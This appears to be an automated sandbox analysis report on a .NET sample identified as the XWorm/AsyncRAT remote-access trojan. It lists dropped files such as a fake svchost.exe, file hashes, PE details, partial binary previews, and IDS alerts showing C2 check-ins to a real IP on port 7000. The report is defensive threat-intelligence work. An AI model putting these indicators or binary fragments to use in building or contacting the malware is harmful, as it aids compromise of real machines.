                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):41
                                                    Entropy (8bit):3.7195394315431693
                                                    Encrypted:false
                                                    SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                    MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                    SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                    SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                    SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                    Malicious:false
                                                    Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4156416
                                                    Entropy (8bit):7.99943056153774
                                                    Encrypted:true
                                                    SSDEEP:98304:mer3mJdJ0Gz+yQ3zkgHC3lD1qhPEeXkZGRaGxOJx1/q:jSJdJrz+yOkg8BQPfXYoI1
                                                    MD5:C442A9B9299246B2E5683641A4341641
                                                    SHA1:31F41C27CEACC503F33EA72C1AC7C077BC5D9235
                                                    SHA-256:DEDD4C249A6A78E8E2603E7BF8227BBCD1DCCA0E0F272EC204CF4A1A61DAE7D9
                                                    SHA-512:FC605ADCF43C6F4AE4B4903CF1BA43BC447DDECBBAA8E412845B0DDFEE4B36BE55E32B42B3005C7C67BB59F5F2A4C9271BAA97EB497C4998883F7E69EC8BDD36
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.(g.................b?.........>.?.. ....?...@.. ........................?...........@...................................?.W.....?.......................?...................................................... ............... ..H............text...D`?.. ...b?................. ..`.rsrc.........?......d?.............@..@.reloc........?......j?.............@..B................ .?.....H.......dW?..(......!...$&..@1?...........................................(....*.r...p*. ....*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r#..p*. ..?.*.r...p*. n3..*.rE..p*. .O..*.r...p*. Fc7.*.rg..p*. .(T.*..(&...*.r...p*. S...*.rO..p*.r...p*. S...*.r3..p*. rmB.*.r...p*. W.R.*.r...p*. ..e.*.r...p*. `...*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0......
                                                    Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 2 18:10:37 2025, mtime=Thu Jan 2 18:10:38 2025, atime=Thu Jan 2 18:10:37 2025, length=69632, window=hide
                                                    Category:dropped
                                                    Size (bytes):765
                                                    Entropy (8bit):5.0873789393675795
                                                    Encrypted:false
                                                    SSDEEP:12:8frEA24CykChzQY//jt3/ELgfQatw9jAc0CUHkhzBz/mV:8frE6CAX7N/mgBtEAc0OhNDm
                                                    MD5:6790E3AE026FE7ACD9C1C4489FE2E9BA
                                                    SHA1:0B5B916AB2105462977880136DCE59B5BD0E2C5F
                                                    SHA-256:FDBC46EBEEFF7CF8FA3D24880E61A085B7EF311BF88682B65466492D5A5FEF6F
                                                    SHA-512:68FADD8F671BCA7FC8E2F56208F6EA0EA182B440780A18CE8A4F545F6E31A8803F3DF25F3E7D8943B499EFADC200005243D8E726774A63C0F07B0C51C50F292B
                                                    Malicious:false
                                                    Preview:L..................F.... .....r.J]..OMN.J]....r.J]..........................v.:..DG..Yr?.D..U..k0.&...&.......y.Yd.......I]..V.E)J]......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B"ZQ...........................d...A.p.p.D.a.t.a...B.V.1....."ZS...Roaming.@......EW)B"ZS..............................R.o.a.m.i.n.g.....b.2....."ZS. .svchost.exe.H......"ZS."ZS..............................s.v.c.h.o.s.t...e.x.e.......Z...............-.......Y...........&........C:\Users\user\AppData\Roaming\svchost.exe........\.....\.....\.....\.....\.s.v.c.h.o.s.t...e.x.e.`.......X.......971342...........hT..CrF.f4... .c.LW=....,...E...hT..CrF.f4... .c.LW=....,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                    Process:C:\Users\user\Desktop\file.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.975187764500989
                                                    Encrypted:false
                                                    SSDEEP:1536:WT/juex6LhRZniVHnXSe8PmWbT04YzNgWIOp6yF1R9Oc7uu:WjjuIpVHnXSe2xbTWqOlz9Ocau
                                                    MD5:6D378D7AF71086710318CDDA873D9348
                                                    SHA1:3D55D27FB66361254D954060904E5EE0B6CD13C1
                                                    SHA-256:531640277D1DC2206A49F3A69D412CFECECC97251247917403A69ABF982E492B
                                                    SHA-512:696B94E8D8FBAB051C1DB635765DAE200CAAA631850950D4B39F0AB92B4968EEDB3B86888F2E9A54CBA6DB7667A5FF4087B25F97E6C999A1464E2AD7B87DE131
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 92%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag............................>%... ...@....@.. ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ %......H........b..........&.....................................................(....*.r...p*. .=l.*..(....*.r!..p*. ^...*.s.........s.........s.........s.........*.r...p*. S...*.r...p*. .s..*.rr..p*. ...*.r...p*. ..Q.*.r>..p*. ....*..((...*.rr..p*. x.`.*.r...p*. FwB.*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.rN..p*. .x!.*.r...p*. *p{.*.r...p*.r...p*. Q...*.r...p*.rL..p*. ....*.r...p*.r...p*.r..
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.999645683890383
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:file.exe
                                                    File size:4'238'848 bytes
                                                    MD5:838f4cdbbfc3d37d94c45da811be76a8
                                                    SHA1:822be42f201602ee3a7bb84363e1edd8dc595651
                                                    SHA256:c4d520b953525a1e9ad38ec6a8addef6584ca7e1d479bc1ddc6ef3a79a537bce
                                                    SHA512:db227c85d10865fb63afb6c8efac3aefa78ba8f2e8fb6dc7689df6406704723244beaf19b3110b0cf5f55ac125bc03ed7a4256cd25df4ea642e2101a28298ebf
                                                    SSDEEP:98304:L+wD9dYGG4m1mhxWH+ADn/Juj68DJD2lyDSaM/:6w5dUixVAD/eN1Smi
                                                    TLSH:7516336A130E2D1DFF212B726C55CF5B0EA014CA23EDDE7AE495FE085A075C680ED7A4
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I.Ag..................@...........@.. ....@...@.. ....................... A...........@................................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x80c2de
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6741F349 [Sat Nov 23 15:22:49 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                     Name | Virtual Address | Virtual Size | Is in Section
                                                     IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_IMPORT | 0x40c288 | 0x53 | .text
                                                     IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40e000 | 0x4fe | .rsrc
                                                     IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x410000 | 0xc | .reloc
                                                     IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                     IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                     IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                     IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                     Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                     .text | 0x2000 | 0x40a2e4 | 0x40a400 | 2ec5ac6e7b7a6313c83f4d88c9fca786 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                     .rsrc | 0x40e000 | 0x4fe | 0x600 | 52f04eececa42d6aee35f662ad874d82 | False | 0.3841145833333333 | data | 3.8175729399016762 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                     .reloc | 0x410000 | 0xc | 0x200 | fdd0e9535f9cb0e10cb8c9a0646b9f8e | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                     Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                     RT_VERSION | 0x40e0a0 | 0x274 | data | | | 0.4538216560509554
                                                     RT_MANIFEST | 0x40e314 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                     DLL | Import
                                                     mscoree.dll | _CorExeMain
                                                     Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                     2025-01-02T20:11:58.350785+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
                                                     2025-01-02T20:11:58.713923+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:11:58.741684+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
                                                     2025-01-02T20:12:12.020324+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:12.022175+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
                                                     2025-01-02T20:12:12.238556+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:12.238556+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:25.101934+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:25.103841+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
                                                     2025-01-02T20:12:38.304580+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:38.306446+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
                                                     2025-01-02T20:12:42.246089+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:42.246089+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:44.916589+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.134 | 7000 | 192.168.2.8 | 49788 | TCP
                                                     2025-01-02T20:12:44.917491+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49788 | 45.141.26.134 | 7000 | TCP
                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                     Jan 2, 2025 20:10:42.130259991 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
                                                     Jan 2, 2025 20:10:42.135140896 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
                                                     Jan 2, 2025 20:10:42.135226011 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
                                                     Jan 2, 2025 20:10:42.135515928 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
                                                     Jan 2, 2025 20:10:42.140245914 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
                                                     Jan 2, 2025 20:10:42.592787981 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
                                                     Jan 2, 2025 20:10:42.644046068 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
                                                     Jan 2, 2025 20:11:45.106187105 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:11:45.111148119 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:11:45.111287117 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:11:45.155917883 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:11:45.160736084 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:11:51.136646032 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
                                                     Jan 2, 2025 20:11:51.136698961 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
                                                     Jan 2, 2025 20:11:58.350785017 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:11:58.355644941 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:11:58.713922977 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:11:58.741683960 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:11:58.746484995 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:11.551253080 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:11.556073904 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:12.020323992 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:12.022175074 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:12.026985884 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:12.238555908 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:12.284698009 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:22.599345922 CET | 49706 | 80 | 192.168.2.8 | 208.95.112.1
                                                     Jan 2, 2025 20:12:22.604129076 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.8
                                                     Jan 2, 2025 20:12:24.753901005 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:24.759784937 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:25.101933956 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:25.103841066 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:25.108686924 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:37.957237959 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:37.962135077 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:38.304579973 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:38.306446075 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:38.311333895 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:42.246088982 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:42.300359011 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:44.566409111 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:44.571253061 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:44.916589022 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Jan 2, 2025 20:12:44.917490959 CET | 49788 | 7000 | 192.168.2.8 | 45.141.26.134
                                                     Jan 2, 2025 20:12:44.922324896 CET | 7000 | 49788 | 45.141.26.134 | 192.168.2.8
                                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                     Jan 2, 2025 20:10:42.116089106 CET | 59748 | 53 | 192.168.2.8 | 1.1.1.1
                                                     Jan 2, 2025 20:10:42.123480082 CET | 53 | 59748 | 1.1.1.1 | 192.168.2.8
                                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                     Jan 2, 2025 20:10:42.116089106 CET | 192.168.2.8 | 1.1.1.1 | 0xb4a | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                     Jan 2, 2025 20:10:42.123480082 CET | 1.1.1.1 | 192.168.2.8 | 0xb4a | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                    • ip-api.com
                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     0 | 192.168.2.8 | 49706 | 208.95.112.1 | 80 | 5280 | C:\Users\user\AppData\Roaming\svchost.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jan 2, 2025 20:10:42.135515928 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                     Host: ip-api.com
                                                     Connection: Keep-Alive
                                                     Jan 2, 2025 20:10:42.592787981 CET | 175 | IN | HTTP/1.1 200 OK
                                                    Date: Thu, 02 Jan 2025 19:10:42 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Content-Length: 6
                                                    Access-Control-Allow-Origin: *
                                                    X-Ttl: 60
                                                    X-Rl: 44
                                                    Data Raw: 66 61 6c 73 65 0a
                                                    Data Ascii: false

                                                    Target ID:0
                                                    Start time:14:10:36
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\Desktop\file.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                    Imagebase:0x490000
                                                    File size:4'238'848 bytes
                                                    MD5 hash:838F4CDBBFC3D37D94C45DA811BE76A8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1672288398.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:14:10:36
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                    Imagebase:0x110000
                                                    File size:4'156'416 bytes
                                                    MD5 hash:C442A9B9299246B2E5683641A4341641
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.1682898125.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 83%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:14:10:37
                                                    Start date:02/01/2025
                                                    Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                    Imagebase:0xa30000
                                                    File size:69'632 bytes
                                                    MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1667439637.0000000000A32000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2914398163.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2914398163.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
